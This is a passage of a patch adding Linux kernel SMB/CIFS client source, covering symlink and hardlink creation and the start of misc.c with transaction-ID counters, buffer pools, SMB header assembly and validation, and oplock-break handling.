++smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++		       struct cifs_sb_info *cifs_sb, const unsigned char *path,
++		       char *pbuf, unsigned int *pbytes_written)
++{
++	int rc;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifs_io_parms io_parms = {0};
++	__le16 *utf16_path;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct kvec iov[2];
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.path = path,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.fid = &fid,
++		.mode = 0644,
++	};
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
++		       NULL, NULL);
++	if (rc) {
++		kfree(utf16_path);
++		return rc;
++	}
++
++	io_parms.netfid = fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
++	io_parms.persistent_fid = fid.persistent_fid;
++	io_parms.volatile_fid = fid.volatile_fid;
++
++	/* iov[0] is reserved for smb header */
++	iov[1].iov_base = pbuf;
++	iov[1].iov_len = CIFS_MF_SYMLINK_FILE_SIZE;
++
++	rc = SMB2_write(xid, &io_parms, pbytes_written, iov, 1);
++
++	/* Make sure we wrote all of the symlink data */
++	if ((rc == 0) && (*pbytes_written != CIFS_MF_SYMLINK_FILE_SIZE))
++		rc = -EIO;
++
++	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++
++	kfree(utf16_path);
++	return rc;
++}
++
++/*
++ * M-F Symlink Functions - End
++ */
++
++int
++cifs_hardlink(struct dentry *old_file, struct inode *inode,
++	      struct dentry *direntry)
++{
++	int rc = -EACCES;
++	unsigned int xid;
++	const char *from_name, *to_name;
++	void *page1, *page2;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifsInodeInfo *cifsInode;
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	xid = get_xid();
++	page1 = alloc_dentry_path();
++	page2 = alloc_dentry_path();
++
++	from_name = build_path_from_dentry(old_file, page1);
++	if (IS_ERR(from_name)) {
++		rc = PTR_ERR(from_name);
++		goto cifs_hl_exit;
++	}
++	to_name = build_path_from_dentry(direntry, page2);
++	if (IS_ERR(to_name)) {
++		rc = PTR_ERR(to_name);
++		goto cifs_hl_exit;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (tcon->unix_ext)
++		rc = CIFSUnixCreateHardLink(xid, tcon, from_name, to_name,
++					    cifs_sb->local_nls,
++					    cifs_remap(cifs_sb));
++	else {
++#else
++	{
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		server = tcon->ses->server;
++		if (!server->ops->create_hardlink) {
++			rc = -ENOSYS;
++			goto cifs_hl_exit;
++		}
++		rc = server->ops->create_hardlink(xid, tcon, from_name, to_name,
++						  cifs_sb);
++		if ((rc == -EIO) || (rc == -EINVAL))
++			rc = -EOPNOTSUPP;
++	}
++
++	d_drop(direntry);	/* force new lookup from server of target */
++
++	/*
++	 * if source file is cached (oplocked) revalidate will not go to server
++	 * until the file is closed or oplock broken so update nlinks locally
++	 */
++	if (d_really_is_positive(old_file)) {
++		cifsInode = CIFS_I(d_inode(old_file));
++		if (rc == 0) {
++			spin_lock(&d_inode(old_file)->i_lock);
++			inc_nlink(d_inode(old_file));
++			spin_unlock(&d_inode(old_file)->i_lock);
++
++			/*
++			 * parent dir timestamps will update from srv within a
++			 * second, would it really be worth it to set the parent
++			 * dir cifs inode time to zero to force revalidate
++			 * (faster) for it too?
++			 */
++		}
++		/*
++		 * if not oplocked will force revalidate to get info on source
++		 * file from srv.  Note Samba server prior to 4.2 has bug -
++		 * not updating src file ctime on hardlinks but Windows servers
++		 * handle it properly
++		 */
++		cifsInode->time = 0;
++
++		/*
++		 * Will update parent dir timestamps from srv within a second.
++		 * Would it really be worth it to set the parent dir (cifs
++		 * inode) time field to zero to force revalidate on parent
++		 * directory faster ie
++		 *
++		 * CIFS_I(inode)->time = 0;
++		 */
++	}
++
++cifs_hl_exit:
++	free_dentry_path(page1);
++	free_dentry_path(page2);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++int
++cifs_symlink(struct user_namespace *mnt_userns, struct inode *inode,
++	     struct dentry *direntry, const char *symname)
++{
++	int rc = -EOPNOTSUPP;
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	const char *full_path;
++	void *page;
++	struct inode *newinode = NULL;
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	page = alloc_dentry_path();
++	if (!page)
++		return -ENOMEM;
++
++	xid = get_xid();
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		rc = PTR_ERR(tlink);
++		goto symlink_exit;
++	}
++	pTcon = tlink_tcon(tlink);
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto symlink_exit;
++	}
++
++	cifs_dbg(FYI, "Full path: %s\n", full_path);
++	cifs_dbg(FYI, "symname is %s\n", symname);
++
++	/* BB what if DFS and this volume is on different share? BB */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS)
++		rc = create_mf_symlink(xid, pTcon, cifs_sb, full_path, symname);
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	else if (pTcon->unix_ext)
++		rc = CIFSUnixCreateSymLink(xid, pTcon, full_path, symname,
++					   cifs_sb->local_nls,
++					   cifs_remap(cifs_sb));
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	/* else
++	   rc = CIFSCreateReparseSymLink(xid, pTcon, fromName, toName,
++					cifs_sb_target->local_nls); */
++
++	if (rc == 0) {
++		if (pTcon->posix_extensions)
++			rc = smb311_posix_get_inode_info(&newinode, full_path, inode->i_sb, xid);
++		else if (pTcon->unix_ext)
++			rc = cifs_get_inode_info_unix(&newinode, full_path,
++						      inode->i_sb, xid);
++		else
++			rc = cifs_get_inode_info(&newinode, full_path, NULL,
++						 inode->i_sb, xid, NULL);
++
++		if (rc != 0) {
++			cifs_dbg(FYI, "Create symlink ok, getinodeinfo fail rc = %d\n",
++				 rc);
++		} else {
++			d_instantiate(direntry, newinode);
++		}
++	}
++symlink_exit:
++	free_dentry_path(page);
++	cifs_put_tlink(tlink);
++	free_xid(xid);
++	return rc;
++}
+diff --git a/fs/smb/client/misc.c b/fs/smb/client/misc.c
+new file mode 100644
+index 0000000000000..31e06133acc3d
+--- /dev/null
++++ b/fs/smb/client/misc.c
+@@ -0,0 +1,1434 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#include <linux/slab.h>
++#include <linux/ctype.h>
++#include <linux/mempool.h>
++#include <linux/vmalloc.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "smberr.h"
++#include "nterr.h"
++#include "cifs_unicode.h"
++#include "smb2pdu.h"
++#include "cifsfs.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dns_resolve.h"
++#include "dfs_cache.h"
++#endif
++#include "fs_context.h"
++#include "cached_dir.h"
++
++extern mempool_t *cifs_sm_req_poolp;
++extern mempool_t *cifs_req_poolp;
++
++/* The xid serves as a useful identifier for each incoming vfs request,
++   in a similar way to the mid which is useful to track each sent smb,
++   and CurrentXid can also provide a running counter (although it
++   will eventually wrap past zero) of the total vfs operations handled
++   since the cifs fs was mounted */
++
++unsigned int
++_get_xid(void)
++{
++	unsigned int xid;
++
++	spin_lock(&GlobalMid_Lock);
++	GlobalTotalActiveXid++;
++
++	/* keep high water mark for number of simultaneous ops in filesystem */
++	if (GlobalTotalActiveXid > GlobalMaxActiveXid)
++		GlobalMaxActiveXid = GlobalTotalActiveXid;
++	if (GlobalTotalActiveXid > 65000)
++		cifs_dbg(FYI, "warning: more than 65000 requests active\n");
++	xid = GlobalCurrentXid++;
++	spin_unlock(&GlobalMid_Lock);
++	return xid;
++}
++
++void
++_free_xid(unsigned int xid)
++{
++	spin_lock(&GlobalMid_Lock);
++	/* if (GlobalTotalActiveXid == 0)
++		BUG(); */
++	GlobalTotalActiveXid--;
++	spin_unlock(&GlobalMid_Lock);
++}
++
++struct cifs_ses *
++sesInfoAlloc(void)
++{
++	struct cifs_ses *ret_buf;
++
++	ret_buf = kzalloc(sizeof(struct cifs_ses), GFP_KERNEL);
++	if (ret_buf) {
++		atomic_inc(&sesInfoAllocCount);
++		spin_lock_init(&ret_buf->ses_lock);
++		ret_buf->ses_status = SES_NEW;
++		++ret_buf->ses_count;
++		INIT_LIST_HEAD(&ret_buf->smb_ses_list);
++		INIT_LIST_HEAD(&ret_buf->tcon_list);
++		mutex_init(&ret_buf->session_mutex);
++		spin_lock_init(&ret_buf->iface_lock);
++		INIT_LIST_HEAD(&ret_buf->iface_list);
++		spin_lock_init(&ret_buf->chan_lock);
++	}
++	return ret_buf;
++}
++
++void
++sesInfoFree(struct cifs_ses *buf_to_free)
++{
++	struct cifs_server_iface *iface = NULL, *niface = NULL;
++
++	if (buf_to_free == NULL) {
++		cifs_dbg(FYI, "Null buffer passed to sesInfoFree\n");
++		return;
++	}
++
++	atomic_dec(&sesInfoAllocCount);
++	kfree(buf_to_free->serverOS);
++	kfree(buf_to_free->serverDomain);
++	kfree(buf_to_free->serverNOS);
++	kfree_sensitive(buf_to_free->password);
++	kfree(buf_to_free->user_name);
++	kfree(buf_to_free->domainName);
++	kfree_sensitive(buf_to_free->auth_key.response);
++	spin_lock(&buf_to_free->iface_lock);
++	list_for_each_entry_safe(iface, niface, &buf_to_free->iface_list,
++				 iface_head)
++		kref_put(&iface->refcount, release_iface);
++	spin_unlock(&buf_to_free->iface_lock);
++	kfree_sensitive(buf_to_free);
++}
++
++struct cifs_tcon *
++tconInfoAlloc(void)
++{
++	struct cifs_tcon *ret_buf;
++
++	ret_buf = kzalloc(sizeof(*ret_buf), GFP_KERNEL);
++	if (!ret_buf)
++		return NULL;
++	ret_buf->cfids = init_cached_dirs();
++	if (!ret_buf->cfids) {
++		kfree(ret_buf);
++		return NULL;
++	}
++
++	atomic_inc(&tconInfoAllocCount);
++	ret_buf->status = TID_NEW;
++	++ret_buf->tc_count;
++	spin_lock_init(&ret_buf->tc_lock);
++	INIT_LIST_HEAD(&ret_buf->openFileList);
++	INIT_LIST_HEAD(&ret_buf->tcon_list);
++	spin_lock_init(&ret_buf->open_file_lock);
++	spin_lock_init(&ret_buf->stat_lock);
++	atomic_set(&ret_buf->num_local_opens, 0);
++	atomic_set(&ret_buf->num_remote_opens, 0);
++
++	return ret_buf;
++}
++
++void
++tconInfoFree(struct cifs_tcon *tcon)
++{
++	if (tcon == NULL) {
++		cifs_dbg(FYI, "Null buffer passed to tconInfoFree\n");
++		return;
++	}
++	free_cached_dirs(tcon->cfids);
++	atomic_dec(&tconInfoAllocCount);
++	kfree(tcon->nativeFileSystem);
++	kfree_sensitive(tcon->password);
++	kfree(tcon);
++}
++
++struct smb_hdr *
++cifs_buf_get(void)
++{
++	struct smb_hdr *ret_buf = NULL;
++	/*
++	 * SMB2 header is bigger than CIFS one - no problems to clean some
++	 * more bytes for CIFS.
++	 */
++	size_t buf_size = sizeof(struct smb2_hdr);
++
++	/*
++	 * We could use negotiated size instead of max_msgsize -
++	 * but it may be more efficient to always alloc same size
++	 * albeit slightly larger than necessary and maxbuffersize
++	 * defaults to this and can not be bigger.
++	 */
++	ret_buf = mempool_alloc(cifs_req_poolp, GFP_NOFS);
++
++	/* clear the first few header bytes */
++	/* for most paths, more is cleared in header_assemble */
++	memset(ret_buf, 0, buf_size + 3);
++	atomic_inc(&buf_alloc_count);
++#ifdef CONFIG_CIFS_STATS2
++	atomic_inc(&total_buf_alloc_count);
++#endif /* CONFIG_CIFS_STATS2 */
++
++	return ret_buf;
++}
++
++void
++cifs_buf_release(void *buf_to_free)
++{
++	if (buf_to_free == NULL) {
++		/* cifs_dbg(FYI, "Null buffer passed to cifs_buf_release\n");*/
++		return;
++	}
++	mempool_free(buf_to_free, cifs_req_poolp);
++
++	atomic_dec(&buf_alloc_count);
++	return;
++}
++
++struct smb_hdr *
++cifs_small_buf_get(void)
++{
++	struct smb_hdr *ret_buf = NULL;
++
++/* We could use negotiated size instead of max_msgsize -
++   but it may be more efficient to always alloc same size
++   albeit slightly larger than necessary and maxbuffersize
++   defaults to this and can not be bigger */
++	ret_buf = mempool_alloc(cifs_sm_req_poolp, GFP_NOFS);
++	/* No need to clear memory here, cleared in header assemble */
++	/*	memset(ret_buf, 0, sizeof(struct smb_hdr) + 27);*/
++	atomic_inc(&small_buf_alloc_count);
++#ifdef CONFIG_CIFS_STATS2
++	atomic_inc(&total_small_buf_alloc_count);
++#endif /* CONFIG_CIFS_STATS2 */
++
++	return ret_buf;
++}
++
++void
++cifs_small_buf_release(void *buf_to_free)
++{
++
++	if (buf_to_free == NULL) {
++		cifs_dbg(FYI, "Null buffer passed to cifs_small_buf_release\n");
++		return;
++	}
++	mempool_free(buf_to_free, cifs_sm_req_poolp);
++
++	atomic_dec(&small_buf_alloc_count);
++	return;
++}
++
++void
++free_rsp_buf(int resp_buftype, void *rsp)
++{
++	if (resp_buftype == CIFS_SMALL_BUFFER)
++		cifs_small_buf_release(rsp);
++	else if (resp_buftype == CIFS_LARGE_BUFFER)
++		cifs_buf_release(rsp);
++}
++
++/* NB: MID can not be set if treeCon not passed in, in that
++   case it is responsbility of caller to set the mid */
++void
++header_assemble(struct smb_hdr *buffer, char smb_command /* command */ ,
++		const struct cifs_tcon *treeCon, int word_count
++		/* length of fixed section (word count) in two byte units  */)
++{
++	char *temp = (char *) buffer;
++
++	memset(temp, 0, 256); /* bigger than MAX_CIFS_HDR_SIZE */
++
++	buffer->smb_buf_length = cpu_to_be32(
++	    (2 * word_count) + sizeof(struct smb_hdr) -
++	    4 /*  RFC 1001 length field does not count */  +
++	    2 /* for bcc field itself */) ;
++
++	buffer->Protocol[0] = 0xFF;
++	buffer->Protocol[1] = 'S';
++	buffer->Protocol[2] = 'M';
++	buffer->Protocol[3] = 'B';
++	buffer->Command = smb_command;
++	buffer->Flags = 0x00;	/* case sensitive */
++	buffer->Flags2 = SMBFLG2_KNOWS_LONG_NAMES;
++	buffer->Pid = cpu_to_le16((__u16)current->tgid);
++	buffer->PidHigh = cpu_to_le16((__u16)(current->tgid >> 16));
++	if (treeCon) {
++		buffer->Tid = treeCon->tid;
++		if (treeCon->ses) {
++			if (treeCon->ses->capabilities & CAP_UNICODE)
++				buffer->Flags2 |= SMBFLG2_UNICODE;
++			if (treeCon->ses->capabilities & CAP_STATUS32)
++				buffer->Flags2 |= SMBFLG2_ERR_STATUS;
++
++			/* Uid is not converted */
++			buffer->Uid = treeCon->ses->Suid;
++			if (treeCon->ses->server)
++				buffer->Mid = get_next_mid(treeCon->ses->server);
++		}
++		if (treeCon->Flags & SMB_SHARE_IS_IN_DFS)
++			buffer->Flags2 |= SMBFLG2_DFS;
++		if (treeCon->nocase)
++			buffer->Flags  |= SMBFLG_CASELESS;
++		if ((treeCon->ses) && (treeCon->ses->server))
++			if (treeCon->ses->server->sign)
++				buffer->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++	}
++
++/*  endian conversion of flags is now done just before sending */
++	buffer->WordCount = (char) word_count;
++	return;
++}
++
++static int
++check_smb_hdr(struct smb_hdr *smb)
++{
++	/* does it have the right SMB "signature" ? */
++	if (*(__le32 *) smb->Protocol != cpu_to_le32(0x424d53ff)) {
++		cifs_dbg(VFS, "Bad protocol string signature header 0x%x\n",
++			 *(unsigned int *)smb->Protocol);
++		return 1;
++	}
++
++	/* if it's a response then accept */
++	if (smb->Flags & SMBFLG_RESPONSE)
++		return 0;
++
++	/* only one valid case where server sends us request */
++	if (smb->Command == SMB_COM_LOCKING_ANDX)
++		return 0;
++
++	cifs_dbg(VFS, "Server sent request, not response. mid=%u\n",
++		 get_mid(smb));
++	return 1;
++}
++
++int
++checkSMB(char *buf, unsigned int total_read, struct TCP_Server_Info *server)
++{
++	struct smb_hdr *smb = (struct smb_hdr *)buf;
++	__u32 rfclen = be32_to_cpu(smb->smb_buf_length);
++	__u32 clc_len;  /* calculated length */
++	cifs_dbg(FYI, "checkSMB Length: 0x%x, smb_buf_length: 0x%x\n",
++		 total_read, rfclen);
++
++	/* is this frame too small to even get to a BCC? */
++	if (total_read < 2 + sizeof(struct smb_hdr)) {
++		if ((total_read >= sizeof(struct smb_hdr) - 1)
++			    && (smb->Status.CifsError != 0)) {
++			/* it's an error return */
++			smb->WordCount = 0;
++			/* some error cases do not return wct and bcc */
++			return 0;
++		} else if ((total_read == sizeof(struct smb_hdr) + 1) &&
++				(smb->WordCount == 0)) {
++			char *tmp = (char *)smb;
++			/* Need to work around a bug in two servers here */
++			/* First, check if the part of bcc they sent was zero */
++			if (tmp[sizeof(struct smb_hdr)] == 0) {
++				/* some servers return only half of bcc
++				 * on simple responses (wct, bcc both zero)
++				 * in particular have seen this on
++				 * ulogoffX and FindClose. This leaves
++				 * one byte of bcc potentially unitialized
++				 */
++				/* zero rest of bcc */
++				tmp[sizeof(struct smb_hdr)+1] = 0;
++				return 0;
++			}
++			cifs_dbg(VFS, "rcvd invalid byte count (bcc)\n");
++		} else {
++			cifs_dbg(VFS, "Length less than smb header size\n");
++		}
++		return -EIO;
++	}
++
++	/* otherwise, there is enough to get to the BCC */
++	if (check_smb_hdr(smb))
++		return -EIO;
++	clc_len = smbCalcSize(smb);
++
++	if (4 + rfclen != total_read) {
++		cifs_dbg(VFS, "Length read does not match RFC1001 length %d\n",
++			 rfclen);
++		return -EIO;
++	}
++
++	if (4 + rfclen != clc_len) {
++		__u16 mid = get_mid(smb);
++		/* check if bcc wrapped around for large read responses */
++		if ((rfclen > 64 * 1024) && (rfclen > clc_len)) {
++			/* check if lengths match mod 64K */
++			if (((4 + rfclen) & 0xFFFF) == (clc_len & 0xFFFF))
++				return 0; /* bcc wrapped */
++		}
++		cifs_dbg(FYI, "Calculated size %u vs length %u mismatch for mid=%u\n",
++			 clc_len, 4 + rfclen, mid);
++
++		if (4 + rfclen < clc_len) {
++			cifs_dbg(VFS, "RFC1001 size %u smaller than SMB for mid=%u\n",
++				 rfclen, mid);
++			return -EIO;
++		} else if (rfclen > clc_len + 512) {
++			/*
++			 * Some servers (Windows XP in particular) send more
++			 * data than the lengths in the SMB packet would
++			 * indicate on certain calls (byte range locks and
++			 * trans2 find first calls in particular). While the
++			 * client can handle such a frame by ignoring the
++			 * trailing data, we choose limit the amount of extra
++			 * data to 512 bytes.
++			 */
++			cifs_dbg(VFS, "RFC1001 size %u more than 512 bytes larger than SMB for mid=%u\n",
++				 rfclen, mid);
++			return -EIO;
++		}
++	}
++	return 0;
++}
++
++bool
++is_valid_oplock_break(char *buffer, struct TCP_Server_Info *srv)
++{
++	struct smb_hdr *buf = (struct smb_hdr *)buffer;
++	struct smb_com_lock_req *pSMB = (struct smb_com_lock_req *)buf;
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct cifsInodeInfo *pCifsInode;
++	struct cifsFileInfo *netfile;
++
++	cifs_dbg(FYI, "Checking for oplock break or dnotify response\n");
++	if ((pSMB->hdr.Command == SMB_COM_NT_TRANSACT) &&
++	   (pSMB->hdr.Flags & SMBFLG_RESPONSE)) {
++		struct smb_com_transaction_change_notify_rsp *pSMBr =
++			(struct smb_com_transaction_change_notify_rsp *)buf;
++		struct file_notify_information *pnotify;
++		__u32 data_offset = 0;
++		size_t len = srv->total_read - sizeof(pSMBr->hdr.smb_buf_length);
++
++		if (get_bcc(buf) > sizeof(struct file_notify_information)) {
++			data_offset = le32_to_cpu(pSMBr->DataOffset);
++
++			if (data_offset >
++			    len - sizeof(struct file_notify_information)) {
++				cifs_dbg(FYI, "Invalid data_offset %u\n",
++					 data_offset);
++				return true;
++			}
++			pnotify = (struct file_notify_information *)
++				((char *)&pSMBr->hdr.Protocol + data_offset);
++			cifs_dbg(FYI, "dnotify on %s Action: 0x%x\n",
++				 pnotify->FileName, pnotify->Action);
++			/*   cifs_dump_mem("Rcvd notify Data: ",buf,
++				sizeof(struct smb_hdr)+60); */
++			return true;
++		}
++		if (pSMBr->hdr.Status.CifsError) {
++			cifs_dbg(FYI, "notify err 0x%x\n",
++				 pSMBr->hdr.Status.CifsError);
++			return true;
++		}
++		return false;
++	}
++	if (pSMB->hdr.Command != SMB_COM_LOCKING_ANDX)
++		return false;
++	if (pSMB->hdr.Flags & SMBFLG_RESPONSE) {
++		/* no sense logging error on invalid handle on oplock
++		   break - harmless race between close request and oplock
++		   break response is expected from time to time writing out
++		   large dirty files cached on the client */
++		if ((NT_STATUS_INVALID_HANDLE) ==
++		   le32_to_cpu(pSMB->hdr.Status.CifsError)) {
++			cifs_dbg(FYI, "Invalid handle on oplock break\n");
++			return true;
++		} else if (ERRbadfid ==
++		   le16_to_cpu(pSMB->hdr.Status.DosError.Error)) {
++			return true;
++		} else {
++			return false; /* on valid oplock brk we get "request" */
++		}
++	}
++	if (pSMB->hdr.WordCount != 8)
++		return false;
++
++	cifs_dbg(FYI, "oplock type 0x%x level 0x%x\n",
++		 pSMB->LockType, pSMB->OplockLevel);
++	if (!(pSMB->LockType & LOCKING_ANDX_OPLOCK_RELEASE))
++		return false;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(srv) ? srv->primary_server : srv;
++
++	/* look up tcon based on tid & uid */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++			if (tcon->tid != buf->Tid)
++				continue;
++
++			cifs_stats_inc(&tcon->stats.cifs_stats.num_oplock_brks);
++			spin_lock(&tcon->open_file_lock);
++			list_for_each_entry(netfile, &tcon->openFileList, tlist) {
++				if (pSMB->Fid != netfile->fid.netfid)
++					continue;
++
++				cifs_dbg(FYI, "file id match, oplock break\n");
++				pCifsInode = CIFS_I(d_inode(netfile->dentry));
++
++				set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK,
++					&pCifsInode->flags);
++
++				netfile->oplock_epoch = 0;
++				netfile->oplock_level = pSMB->OplockLevel;
++				netfile->oplock_break_cancelled = false;
++				cifs_queue_oplock_break(netfile);
++
++				spin_unlock(&tcon->open_file_lock);
++				spin_unlock(&cifs_tcp_ses_lock);
++				return true;
++			}
++			spin_unlock(&tcon->open_file_lock);
++			spin_unlock(&cifs_tcp_ses_lock);
++			cifs_dbg(FYI, "No matching file for oplock break\n");
++			return true;
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	cifs_dbg(FYI, "Can not process oplock break for non-existent connection\n");
++	return true;
++}
++
++void
++dump_smb(void *buf, int smb_buf_length)
++{
++	if (traceSMB == 0)
++		return;
++
++	print_hex_dump(KERN_DEBUG, "", DUMP_PREFIX_NONE, 8, 2, buf,
++		       smb_buf_length, true);
++}
++
++void
++cifs_autodisable_serverino(struct cifs_sb_info *cifs_sb)
++{
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
++		struct cifs_tcon *tcon = NULL;
++
++		if (cifs_sb->master_tlink)
++			tcon = cifs_sb_master_tcon(cifs_sb);
++
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
++		cifs_sb->mnt_cifs_serverino_autodisabled = true;
++		cifs_dbg(VFS, "Autodisabling the use of server inode numbers on %s\n",
++			 tcon ? tcon->tree_name : "new server");
++		cifs_dbg(VFS, "The server doesn't seem to support them properly or the files might be on different servers (DFS)\n");
++		cifs_dbg(VFS, "Hardlinks will not be recognized on this mount. Consider mounting with the \"noserverino\" option to silence this message.\n");
++
++	}
++}
++
++void cifs_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock)
++{
++	oplock &= 0xF;
++
++	if (oplock == OPLOCK_EXCLUSIVE) {
++		cinode->oplock = CIFS_CACHE_WRITE_FLG | CIFS_CACHE_READ_FLG;
++		cifs_dbg(FYI, "Exclusive Oplock granted on inode %p\n",
++			 &cinode->netfs.inode);
++	} else if (oplock == OPLOCK_READ) {
++		cinode->oplock = CIFS_CACHE_READ_FLG;
++		cifs_dbg(FYI, "Level II Oplock granted on inode %p\n",
++			 &cinode->netfs.inode);
++	} else
++		cinode->oplock = 0;
++}
++
++/*
++ * We wait for oplock breaks to be processed before we attempt to perform
++ * writes.
++ */
++int cifs_get_writer(struct cifsInodeInfo *cinode)
++{
++	int rc;
++
++start:
++	rc = wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_OPLOCK_BREAK,
++			 TASK_KILLABLE);
++	if (rc)
++		return rc;
++
++	spin_lock(&cinode->writers_lock);
++	if (!cinode->writers)
++		set_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
++	cinode->writers++;
++	/* Check to see if we have started servicing an oplock break */
++	if (test_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags)) {
++		cinode->writers--;
++		if (cinode->writers == 0) {
++			clear_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
++			wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS);
++		}
++		spin_unlock(&cinode->writers_lock);
++		goto start;
++	}
++	spin_unlock(&cinode->writers_lock);
++	return 0;
++}
++
++void cifs_put_writer(struct cifsInodeInfo *cinode)
++{
++	spin_lock(&cinode->writers_lock);
++	cinode->writers--;
++	if (cinode->writers == 0) {
++		clear_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
++		wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS);
++	}
++	spin_unlock(&cinode->writers_lock);
++}
++
++/**
++ * cifs_queue_oplock_break - queue the oplock break handler for cfile
++ * @cfile: The file to break the oplock on
++ *
++ * This function is called from the demultiplex thread when it
++ * receives an oplock break for @cfile.
++ *
++ * Assumes the tcon->open_file_lock is held.
++ * Assumes cfile->file_info_lock is NOT held.
++ */
++void cifs_queue_oplock_break(struct cifsFileInfo *cfile)
++{
++	/*
++	 * Bump the handle refcount now while we hold the
++	 * open_file_lock to enforce the validity of it for the oplock
++	 * break handler. The matching put is done at the end of the
++	 * handler.
++	 */
++	cifsFileInfo_get(cfile);
++
++	queue_work(cifsoplockd_wq, &cfile->oplock_break);
++}
++
++void cifs_done_oplock_break(struct cifsInodeInfo *cinode)
++{
++	clear_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags);
++	wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_OPLOCK_BREAK);
++}
++
++bool
++backup_cred(struct cifs_sb_info *cifs_sb)
++{
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPUID) {
++		if (uid_eq(cifs_sb->ctx->backupuid, current_fsuid()))
++			return true;
++	}
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPGID) {
++		if (in_group_p(cifs_sb->ctx->backupgid))
++			return true;
++	}
++
++	return false;
++}
++
++void
++cifs_del_pending_open(struct cifs_pending_open *open)
++{
++	spin_lock(&tlink_tcon(open->tlink)->open_file_lock);
++	list_del(&open->olist);
++	spin_unlock(&tlink_tcon(open->tlink)->open_file_lock);
++}
++
++void
++cifs_add_pending_open_locked(struct cifs_fid *fid, struct tcon_link *tlink,
++			     struct cifs_pending_open *open)
++{
++	memcpy(open->lease_key, fid->lease_key, SMB2_LEASE_KEY_SIZE);
++	open->oplock = CIFS_OPLOCK_NO_CHANGE;
++	open->tlink = tlink;
++	fid->pending_open = open;
++	list_add_tail(&open->olist, &tlink_tcon(tlink)->pending_opens);
++}
++
++void
++cifs_add_pending_open(struct cifs_fid *fid, struct tcon_link *tlink,
++		      struct cifs_pending_open *open)
++{
++	spin_lock(&tlink_tcon(tlink)->open_file_lock);
++	cifs_add_pending_open_locked(fid, tlink, open);
++	spin_unlock(&tlink_tcon(open->tlink)->open_file_lock);
++}
++
++/*
++ * Critical section which runs after acquiring deferred_lock.
++ * As there is no reference count on cifs_deferred_close, pdclose
++ * should not be used outside deferred_lock.
++ */
++bool
++cifs_is_deferred_close(struct cifsFileInfo *cfile, struct cifs_deferred_close **pdclose)
++{
++	struct cifs_deferred_close *dclose;
++
++	list_for_each_entry(dclose, &CIFS_I(d_inode(cfile->dentry))->deferred_closes, dlist) {
++		if ((dclose->netfid == cfile->fid.netfid) &&
++			(dclose->persistent_fid == cfile->fid.persistent_fid) &&
++			(dclose->volatile_fid == cfile->fid.volatile_fid)) {
++			*pdclose = dclose;
++			return true;
++		}
++	}
++	return false;
++}
++
++/*
++ * Critical section which runs after acquiring deferred_lock.
++ */
++void
